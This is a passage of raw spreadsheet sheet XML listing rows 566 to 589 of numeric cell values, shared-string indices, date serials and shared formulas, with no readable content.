      </c>
      <c r="B566" s="2" t="s">
        <v>2632</v>
      </c>
      <c r="C566" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D566" s="2" t="s">
        <v>2627</v>
      </c>
      <c r="E566" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F566" s="1" t="s">
        <v>1922</v>
      </c>
      <c r="G566" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H566" s="4">
        <v>43232.6625</v>
      </c>
      <c r="I566" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J566" s="1" t="s">
        <v>2629</v>
      </c>
      <c r="K566" s="2" t="s">
        <v>2630</v>
      </c>
      <c r="L566" s="1">
        <v>4.0</v>
      </c>
      <c r="M566" s="1">
        <v>10.0</v>
      </c>
      <c r="N566" s="1" t="s">
        <v>681</v>
      </c>
      <c r="O566" s="1" t="s">
        <v>2631</v>
      </c>
      <c r="P566" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q566" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R566" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S566" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="1">
        <v>8237.0</v>
      </c>
      <c r="B567" s="2" t="s">
        <v>2633</v>
      </c>
      <c r="C567" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D567" s="2" t="s">
        <v>2627</v>
      </c>
      <c r="E567" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F567" s="1" t="s">
        <v>2628</v>
      </c>
      <c r="G567" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H567" s="4">
        <v>43232.66458333333</v>
      </c>
      <c r="I567" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J567" s="1" t="s">
        <v>2629</v>
      </c>
      <c r="K567" s="2" t="s">
        <v>2630</v>
      </c>
      <c r="L567" s="1">
        <v>4.0</v>
      </c>
      <c r="M567" s="1">
        <v>10.0</v>
      </c>
      <c r="N567" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O567" s="1" t="s">
        <v>2631</v>
      </c>
      <c r="P567" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q567" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R567" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S567" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="1">
        <v>8238.0</v>
      </c>
      <c r="B568" s="2" t="s">
        <v>2634</v>
      </c>
      <c r="C568" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D568" s="2" t="s">
        <v>2627</v>
      </c>
      <c r="E568" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F568" s="1" t="s">
        <v>2635</v>
      </c>
      <c r="G568" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H568" s="4">
        <v>43232.71319444444</v>
      </c>
      <c r="I568" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J568" s="1" t="s">
        <v>2629</v>
      </c>
      <c r="K568" s="2" t="s">
        <v>2630</v>
      </c>
      <c r="L568" s="1">
        <v>4.0</v>
      </c>
      <c r="M568" s="1">
        <v>10.0</v>
      </c>
      <c r="N568" s="1" t="s">
        <v>2477</v>
      </c>
      <c r="O568" s="1" t="s">
        <v>2631</v>
      </c>
      <c r="P568" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q568" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R568" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S568" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="1">
        <v>8239.0</v>
      </c>
      <c r="B569" s="2" t="s">
        <v>2636</v>
      </c>
      <c r="C569" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D569" s="2" t="s">
        <v>2627</v>
      </c>
      <c r="E569" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F569" s="1" t="s">
        <v>2628</v>
      </c>
      <c r="G569" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H569" s="4">
        <v>43263.14791666667</v>
      </c>
      <c r="I569" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J569" s="1" t="s">
        <v>2629</v>
      </c>
      <c r="K569" s="2" t="s">
        <v>2630</v>
      </c>
      <c r="L569" s="1">
        <v>4.0</v>
      </c>
      <c r="M569" s="1">
        <v>10.0</v>
      </c>
      <c r="N569" s="1" t="s">
        <v>2637</v>
      </c>
      <c r="O569" s="1" t="s">
        <v>2631</v>
      </c>
      <c r="P569" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q569" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R569" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S569" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="1">
        <v>8240.0</v>
      </c>
      <c r="B570" s="2" t="s">
        <v>2638</v>
      </c>
      <c r="C570" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D570" s="2" t="s">
        <v>2627</v>
      </c>
      <c r="E570" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F570" s="1" t="s">
        <v>2628</v>
      </c>
      <c r="G570" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H570" s="4">
        <v>43293.600694444445</v>
      </c>
      <c r="I570" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J570" s="1" t="s">
        <v>2629</v>
      </c>
      <c r="K570" s="2" t="s">
        <v>2630</v>
      </c>
      <c r="L570" s="1">
        <v>4.0</v>
      </c>
      <c r="M570" s="1">
        <v>10.0</v>
      </c>
      <c r="N570" s="1" t="s">
        <v>2639</v>
      </c>
      <c r="O570" s="1" t="s">
        <v>2631</v>
      </c>
      <c r="P570" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q570" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R570" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S570" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="1">
        <v>8241.0</v>
      </c>
      <c r="B571" s="2" t="s">
        <v>2640</v>
      </c>
      <c r="C571" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D571" s="2" t="s">
        <v>2627</v>
      </c>
      <c r="E571" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F571" s="1" t="s">
        <v>2641</v>
      </c>
      <c r="G571" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H571" s="4">
        <v>43647.34444444445</v>
      </c>
      <c r="I571" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J571" s="1" t="s">
        <v>2629</v>
      </c>
      <c r="K571" s="2" t="s">
        <v>2630</v>
      </c>
      <c r="L571" s="1">
        <v>4.0</v>
      </c>
      <c r="M571" s="1">
        <v>10.0</v>
      </c>
      <c r="N571" s="1" t="s">
        <v>2642</v>
      </c>
      <c r="O571" s="1" t="s">
        <v>2631</v>
      </c>
      <c r="P571" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q571" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R571" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S571" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="1">
        <v>8242.0</v>
      </c>
      <c r="B572" s="2" t="s">
        <v>2643</v>
      </c>
      <c r="C572" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D572" s="2" t="s">
        <v>2627</v>
      </c>
      <c r="E572" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F572" s="1" t="s">
        <v>2641</v>
      </c>
      <c r="G572" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H572" s="4">
        <v>43647.345138888886</v>
      </c>
      <c r="I572" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J572" s="1" t="s">
        <v>2629</v>
      </c>
      <c r="K572" s="2" t="s">
        <v>2630</v>
      </c>
      <c r="L572" s="1">
        <v>4.0</v>
      </c>
      <c r="M572" s="1">
        <v>10.0</v>
      </c>
      <c r="N572" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O572" s="1" t="s">
        <v>2631</v>
      </c>
      <c r="P572" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q572" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R572" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S572" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="1">
        <v>8244.0</v>
      </c>
      <c r="B573" s="2" t="s">
        <v>2644</v>
      </c>
      <c r="C573" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D573" s="2" t="s">
        <v>2627</v>
      </c>
      <c r="E573" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F573" s="1" t="s">
        <v>2628</v>
      </c>
      <c r="G573" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H573" s="1" t="s">
        <v>2645</v>
      </c>
      <c r="I573" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J573" s="1" t="s">
        <v>2629</v>
      </c>
      <c r="K573" s="2" t="s">
        <v>2630</v>
      </c>
      <c r="L573" s="1">
        <v>4.0</v>
      </c>
      <c r="M573" s="1">
        <v>10.0</v>
      </c>
      <c r="N573" s="1" t="s">
        <v>2646</v>
      </c>
      <c r="O573" s="1" t="s">
        <v>2631</v>
      </c>
      <c r="P573" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q573" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R573" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S573" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="1">
        <v>8245.0</v>
      </c>
      <c r="B574" s="2" t="s">
        <v>2647</v>
      </c>
      <c r="C574" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D574" s="2" t="s">
        <v>2648</v>
      </c>
      <c r="E574" s="2" t="s">
        <v>2649</v>
      </c>
      <c r="F574" s="1" t="s">
        <v>2650</v>
      </c>
      <c r="G574" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H574" s="1" t="s">
        <v>2651</v>
      </c>
      <c r="I574" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J574" s="1" t="s">
        <v>2652</v>
      </c>
      <c r="K574" s="2" t="s">
        <v>2653</v>
      </c>
      <c r="L574" s="1">
        <v>1.0</v>
      </c>
      <c r="M574" s="1">
        <v>1.0</v>
      </c>
      <c r="N574" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O574" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P574" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q574" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R574" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S574" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="1">
        <v>8320.0</v>
      </c>
      <c r="B575" s="2" t="s">
        <v>2654</v>
      </c>
      <c r="C575" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D575" s="2" t="s">
        <v>2655</v>
      </c>
      <c r="E575" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F575" s="1" t="s">
        <v>2656</v>
      </c>
      <c r="G575" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H575" s="4">
        <v>43902.73472222222</v>
      </c>
      <c r="I575" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J575" s="1" t="s">
        <v>2657</v>
      </c>
      <c r="K575" s="2" t="s">
        <v>2658</v>
      </c>
      <c r="L575" s="1">
        <v>3.0</v>
      </c>
      <c r="M575" s="1">
        <v>4.0</v>
      </c>
      <c r="N575" s="1" t="s">
        <v>2659</v>
      </c>
      <c r="O575" s="1" t="s">
        <v>2660</v>
      </c>
      <c r="P575" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q575" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R575" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S575" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="1">
        <v>8322.0</v>
      </c>
      <c r="B576" s="2" t="s">
        <v>2661</v>
      </c>
      <c r="C576" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D576" s="2" t="s">
        <v>2662</v>
      </c>
      <c r="E576" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F576" s="1" t="s">
        <v>2663</v>
      </c>
      <c r="G576" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H576" s="1" t="s">
        <v>2664</v>
      </c>
      <c r="I576" s="1" t="s">
        <v>2665</v>
      </c>
      <c r="J576" s="1" t="s">
        <v>2666</v>
      </c>
      <c r="K576" s="2" t="s">
        <v>2667</v>
      </c>
      <c r="L576" s="1">
        <v>3.0</v>
      </c>
      <c r="M576" s="1">
        <v>3.0</v>
      </c>
      <c r="N576" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O576" s="1" t="s">
        <v>2668</v>
      </c>
      <c r="P576" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q576" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R576" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S576" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="1">
        <v>8323.0</v>
      </c>
      <c r="B577" s="2" t="s">
        <v>2669</v>
      </c>
      <c r="C577" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D577" s="2" t="s">
        <v>2662</v>
      </c>
      <c r="E577" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F577" s="1" t="s">
        <v>2670</v>
      </c>
      <c r="G577" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H577" s="1" t="s">
        <v>2671</v>
      </c>
      <c r="I577" s="1" t="s">
        <v>2665</v>
      </c>
      <c r="J577" s="1" t="s">
        <v>2666</v>
      </c>
      <c r="K577" s="2" t="s">
        <v>2667</v>
      </c>
      <c r="L577" s="1">
        <v>3.0</v>
      </c>
      <c r="M577" s="1">
        <v>3.0</v>
      </c>
      <c r="N577" s="1" t="s">
        <v>2672</v>
      </c>
      <c r="O577" s="1" t="s">
        <v>2668</v>
      </c>
      <c r="P577" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q577" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R577" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S577" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="1">
        <v>8324.0</v>
      </c>
      <c r="B578" s="2" t="s">
        <v>2673</v>
      </c>
      <c r="C578" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D578" s="2" t="s">
        <v>2662</v>
      </c>
      <c r="E578" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F578" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G578" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H578" s="1" t="s">
        <v>2674</v>
      </c>
      <c r="I578" s="1" t="s">
        <v>2665</v>
      </c>
      <c r="J578" s="1" t="s">
        <v>2666</v>
      </c>
      <c r="K578" s="2" t="s">
        <v>2667</v>
      </c>
      <c r="L578" s="1">
        <v>3.0</v>
      </c>
      <c r="M578" s="1">
        <v>3.0</v>
      </c>
      <c r="N578" s="1" t="s">
        <v>2675</v>
      </c>
      <c r="O578" s="1" t="s">
        <v>2668</v>
      </c>
      <c r="P578" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q578" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R578" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S578" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="1">
        <v>8327.0</v>
      </c>
      <c r="B579" s="2" t="s">
        <v>2676</v>
      </c>
      <c r="C579" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D579" s="2" t="s">
        <v>2677</v>
      </c>
      <c r="E579" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F579" s="1" t="s">
        <v>2678</v>
      </c>
      <c r="G579" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H579" s="1" t="s">
        <v>2679</v>
      </c>
      <c r="I579" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J579" s="1" t="s">
        <v>2680</v>
      </c>
      <c r="K579" s="2" t="s">
        <v>2681</v>
      </c>
      <c r="L579" s="1">
        <v>3.0</v>
      </c>
      <c r="M579" s="1">
        <v>31.0</v>
      </c>
      <c r="N579" s="1" t="s">
        <v>677</v>
      </c>
      <c r="O579" s="1" t="s">
        <v>2682</v>
      </c>
      <c r="P579" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q579" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R579" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S579" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="1">
        <v>8358.0</v>
      </c>
      <c r="B580" s="2" t="s">
        <v>2683</v>
      </c>
      <c r="C580" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D580" s="2" t="s">
        <v>2684</v>
      </c>
      <c r="E580" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F580" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G580" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H580" s="1" t="s">
        <v>2685</v>
      </c>
      <c r="I580" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J580" s="1" t="s">
        <v>2686</v>
      </c>
      <c r="K580" s="2" t="s">
        <v>2687</v>
      </c>
      <c r="L580" s="1">
        <v>1.0</v>
      </c>
      <c r="M580" s="1">
        <v>1.0</v>
      </c>
      <c r="N580" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O580" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P580" s="1" t="s">
        <v>1688</v>
      </c>
      <c r="Q580" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R580" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="S580" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="1">
        <v>8396.0</v>
      </c>
      <c r="B581" s="2" t="s">
        <v>2688</v>
      </c>
      <c r="C581" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D581" s="2" t="s">
        <v>2689</v>
      </c>
      <c r="E581" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F581" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G581" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H581" s="4">
        <v>44018.51180555556</v>
      </c>
      <c r="I581" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J581" s="1" t="s">
        <v>2690</v>
      </c>
      <c r="K581" s="2" t="s">
        <v>2691</v>
      </c>
      <c r="L581" s="1">
        <v>1.0</v>
      </c>
      <c r="M581" s="1">
        <v>1.0</v>
      </c>
      <c r="N581" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O581" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P581" s="1" t="s">
        <v>2692</v>
      </c>
      <c r="Q581" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R581" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="S581" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="1">
        <v>8397.0</v>
      </c>
      <c r="B582" s="2" t="s">
        <v>2693</v>
      </c>
      <c r="C582" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D582" s="2" t="s">
        <v>2694</v>
      </c>
      <c r="E582" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F582" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G582" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H582" s="4">
        <v>43993.76458333333</v>
      </c>
      <c r="I582" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J582" s="1" t="s">
        <v>2695</v>
      </c>
      <c r="K582" s="2" t="s">
        <v>2696</v>
      </c>
      <c r="L582" s="1">
        <v>1.0</v>
      </c>
      <c r="M582" s="1">
        <v>1.0</v>
      </c>
      <c r="N582" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O582" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P582" s="1" t="s">
        <v>1085</v>
      </c>
      <c r="Q582" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R582" s="2">
        <f t="shared" si="2"/>
        <v>10</v>
      </c>
      <c r="S582" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="1">
        <v>8398.0</v>
      </c>
      <c r="B583" s="2" t="s">
        <v>2697</v>
      </c>
      <c r="C583" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D583" s="2" t="s">
        <v>2698</v>
      </c>
      <c r="E583" s="2" t="s">
        <v>1097</v>
      </c>
      <c r="F583" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G583" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H583" s="4">
        <v>43990.44027777778</v>
      </c>
      <c r="I583" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J583" s="1" t="s">
        <v>2699</v>
      </c>
      <c r="K583" s="2" t="s">
        <v>2700</v>
      </c>
      <c r="L583" s="1">
        <v>1.0</v>
      </c>
      <c r="M583" s="1">
        <v>1.0</v>
      </c>
      <c r="N583" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O583" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P583" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q583" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R583" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S583" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="1">
        <v>8442.0</v>
      </c>
      <c r="B584" s="2" t="s">
        <v>2701</v>
      </c>
      <c r="C584" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D584" s="2" t="s">
        <v>2702</v>
      </c>
      <c r="E584" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F584" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G584" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H584" s="4">
        <v>44843.81736111111</v>
      </c>
      <c r="I584" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="J584" s="1" t="s">
        <v>2703</v>
      </c>
      <c r="K584" s="2" t="s">
        <v>2704</v>
      </c>
      <c r="L584" s="1">
        <v>3.0</v>
      </c>
      <c r="M584" s="1">
        <v>3.0</v>
      </c>
      <c r="N584" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O584" s="1" t="s">
        <v>285</v>
      </c>
      <c r="P584" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q584" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R584" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S584" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="1">
        <v>8444.0</v>
      </c>
      <c r="B585" s="2" t="s">
        <v>2705</v>
      </c>
      <c r="C585" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D585" s="2" t="s">
        <v>2706</v>
      </c>
      <c r="E585" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F585" s="1" t="s">
        <v>2707</v>
      </c>
      <c r="G585" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H585" s="4">
        <v>44843.87569444445</v>
      </c>
      <c r="I585" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="J585" s="1" t="s">
        <v>2703</v>
      </c>
      <c r="K585" s="2" t="s">
        <v>2704</v>
      </c>
      <c r="L585" s="1">
        <v>3.0</v>
      </c>
      <c r="M585" s="1">
        <v>3.0</v>
      </c>
      <c r="N585" s="1" t="s">
        <v>214</v>
      </c>
      <c r="O585" s="1" t="s">
        <v>285</v>
      </c>
      <c r="P585" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q585" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R585" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S585" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="1">
        <v>8476.0</v>
      </c>
      <c r="B586" s="2" t="s">
        <v>2708</v>
      </c>
      <c r="C586" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D586" s="2" t="s">
        <v>2709</v>
      </c>
      <c r="E586" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F586" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G586" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H586" s="1" t="s">
        <v>2710</v>
      </c>
      <c r="I586" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J586" s="1" t="s">
        <v>2711</v>
      </c>
      <c r="K586" s="2" t="s">
        <v>2712</v>
      </c>
      <c r="L586" s="1">
        <v>2.0</v>
      </c>
      <c r="M586" s="1">
        <v>2.0</v>
      </c>
      <c r="N586" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O586" s="1" t="s">
        <v>2713</v>
      </c>
      <c r="P586" s="1" t="s">
        <v>2714</v>
      </c>
      <c r="Q586" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R586" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S586" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="1">
        <v>8500.0</v>
      </c>
      <c r="B587" s="2" t="s">
        <v>2715</v>
      </c>
      <c r="C587" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D587" s="2" t="s">
        <v>2716</v>
      </c>
      <c r="E587" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F587" s="1" t="s">
        <v>2717</v>
      </c>
      <c r="G587" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H587" s="4">
        <v>43962.38333333333</v>
      </c>
      <c r="I587" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J587" s="1" t="s">
        <v>2718</v>
      </c>
      <c r="K587" s="2" t="s">
        <v>2719</v>
      </c>
      <c r="L587" s="1">
        <v>7.0</v>
      </c>
      <c r="M587" s="1">
        <v>10.0</v>
      </c>
      <c r="N587" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O587" s="1" t="s">
        <v>2720</v>
      </c>
      <c r="P587" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q587" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R587" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S587" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="1">
        <v>8501.0</v>
      </c>
      <c r="B588" s="2" t="s">
        <v>2721</v>
      </c>
      <c r="C588" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D588" s="2" t="s">
        <v>2716</v>
      </c>
      <c r="E588" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F588" s="1" t="s">
        <v>2722</v>
      </c>
      <c r="G588" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H588" s="4">
        <v>43962.404861111114</v>
      </c>
      <c r="I588" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J588" s="1" t="s">
        <v>2718</v>
      </c>
      <c r="K588" s="2" t="s">
        <v>2719</v>
      </c>
      <c r="L588" s="1">
        <v>7.0</v>
      </c>
      <c r="M588" s="1">
        <v>10.0</v>
      </c>
      <c r="N588" s="1" t="s">
        <v>1876</v>
      </c>
      <c r="O588" s="1" t="s">
        <v>2720</v>
      </c>
      <c r="P588" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q588" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R588" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S588" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="1">
        <v>8504.0</v>
      </c>
      <c r="B589" s="2" t="s">
        <v>2723</v>
      </c>
      <c r="C589" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D589" s="2" t="s">
        <v>2716</v>
      </c>
      <c r="E589" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F589" s="1" t="s">
        <v>2724</v>
      </c>
      <c r="G589" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H589" s="4">
        <v>43962.48611111111</v>
      </c>
      <c r="I589" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J589" s="1" t="s">
        <v>2718</v>
      </c>
